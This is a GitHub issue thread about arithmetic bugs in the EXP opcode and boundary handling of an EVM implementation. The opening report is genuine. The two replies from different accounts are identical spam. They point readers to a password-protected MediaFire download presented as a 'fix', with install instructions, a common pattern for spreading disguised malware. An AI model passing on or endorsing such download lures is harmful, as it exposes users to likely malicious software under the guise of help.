### ISSUE TITLE
mathematical calculation bug

### ISSUE THREAD

**Issue by AKACoder** [SealSC/SealEVM#32]
Due to incorrect boundary value variables, improper signs, and the absence of modulus setting during EXP calculations, various mathematical errors occurred, resulting in the failure to pass the following test case data tests: [testdata](https://github.com/ethereum/go-ethereum/tree/master/core/vm/testdata)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
